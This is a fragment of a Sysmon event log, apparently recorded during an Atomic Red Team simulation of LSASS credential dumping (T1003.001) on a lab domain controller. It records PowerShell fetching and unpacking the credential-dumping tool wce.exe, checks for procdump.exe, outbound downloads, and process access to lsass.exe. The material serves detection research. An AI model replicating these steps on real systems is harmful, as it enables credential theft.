\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bedacff(wow64) 154100x800000000000000024826Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.445{4DB9351A-A320-60D3-2C06-00000000CF01}7136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (Test-Path C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x800000000000000024825Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.385{4DB9351A-A320-60D3-2B06-00000000CF01}7076ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000024824Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.276{4DB9351A-9DDE-60D3-1600-00000000CF01}12921448C:\Windows\system32\svchost.exe{4DB9351A-A320-60D3-2B06-00000000CF01}7076C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024823Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.276{4DB9351A-9DDE-60D3-1600-00000000CF01}12921340C:\Windows\system32\svchost.exe{4DB9351A-A320-60D3-2B06-00000000CF01}7076C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024822Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.229{4DB9351A-9DDB-60D3-0B00-00000000CF01}628676C:\Windows\system32\lsass.exe{4DB9351A-A320-60D3-2B06-00000000CF01}7076C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024821Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.229{4DB9351A-9DDB-60D3-0B00-00000000CF01}628676C:\Windows\system32\lsass.exe{4DB9351A-A320-60D3-2B06-00000000CF01}7076C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x800000000000000024820Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-CreatePipe2021-06-23 21:09:52.214{4DB9351A-A320-60D3-2B06-00000000CF01}7076\PSHost.132689561921141506.7076.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000024819Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.198{4DB9351A-A320-60D3-2B06-00000000CF01}7076ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_3iya3lfi.tdu.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024818Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.198{4DB9351A-A320-60D3-2B06-00000000CF01}7076ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_r1re4b1r.kd2.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024817Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.182{4DB9351A-A320-60D3-2B06-00000000CF01}7076C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_r1re4b1r.kd2.ps12021-06-23 21:09:52.182 10341000x800000000000000024816Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.167{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A320-60D3-2B06-00000000CF01}7076C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024815Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.104{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A320-60D3-2B06-00000000CF01}7076C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024814Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.104{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A320-60D3-2B06-00000000CF01}7076C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000024813Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.104{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024812Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.104{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024811Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.104{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024810Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.104{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024809Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.104{4DB9351A-9E1D-60D3-8B00-00000000CF01}47086292C:\Windows\system32\csrss.exe{4DB9351A-A320-60D3-2B06-00000000CF01}7076C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024808Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.104{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A320-60D3-2B06-00000000CF01}7076C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bedacff(wow64) 154100x800000000000000024807Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.114{4DB9351A-A320-60D3-2B06-00000000CF01}7076C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (Test-Path C:\AtomicRedTeam\atomics\T1003.001\bin\wce.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x800000000000000024806Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.089{4DB9351A-A31D-60D3-2A06-00000000CF01}5208ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000024805Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:50.457{4DB9351A-A31D-60D3-2A06-00000000CF01}5208C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-663.attackrange.local61522-false155.133.130.34-443https 354300x800000000000000024804Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:50.018{4DB9351A-A31D-60D3-2A06-00000000CF01}5208C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-663.attackrange.local61521-false185.199.109.133cdn-185-199-109-133.github.com443https 23542300x800000000000000024803Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.057{4DB9351A-A31D-60D3-2A06-00000000CF01}5208ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\atomics\T1003.001\bin\wce\READMEMD5=E1D51CEF9AE367C7AFB01B20CED82491,SHA256=B9A938D4240BF7D9F08D90E581A67A4B909315AF7B3AE4BCB770C55FB1A284D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024802Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.057{4DB9351A-A31D-60D3-2A06-00000000CF01}5208ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\atomics\T1003.001\bin\wce\LICENSE.txtMD5=4C3B8FDDD6A79B1080AC076D22E4F8B1,SHA256=0E67520EAAF05746F32CF71E369B534CF40B638604BC9D2066578CE3645C10A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024801Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.057{4DB9351A-A31D-60D3-2A06-00000000CF01}5208ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\atomics\T1003.001\bin\wce\ChangelogMD5=56C15E17550E1298DEDE834303BCAC62,SHA256=EBAE677E6919EE3CDB2BA8A1840C6E39427809B588590F16695AF200CFF848AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024800Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.057{4DB9351A-A31D-60D3-2A06-00000000CF01}5208ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\atomics\T1003.001\bin\wce.zipMD5=D854CC12F7F94781632A47FE9CC8A72C,SHA256=8F4EFA0DDE5320694DD1AA15542FE44FDE4899ED7B3A272063902E773B6C4933,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024799Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localEXE2021-06-23 21:09:52.026{4DB9351A-A31D-60D3-2A06-00000000CF01}5208C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\atomics\T1003.001\bin\wce\wce.exe2021-06-23 21:09:52.026 23542300x800000000000000024887Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:53.917{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2990ADF8BEE955EA03B760CBE0B56E74,SHA256=47DEA2FB8ECE5BB2E42BB234F188E9C3E2AA9A6D05D7852EBE9AB2214B279C61,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000024886Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:53.854{4DB9351A-A321-60D3-2F06-00000000CF01}58926636C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000024885Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:53.651{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=ACF7CCB2AE94B5EB9CEC5948E41F83DD,SHA256=4E665CF2103838A261F5F4364E8523B693ACE380E70CC5CB4A4CF46A365F20D3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000024884Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:53.635{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A321-60D3-2F06-00000000CF01}5892C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024883Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 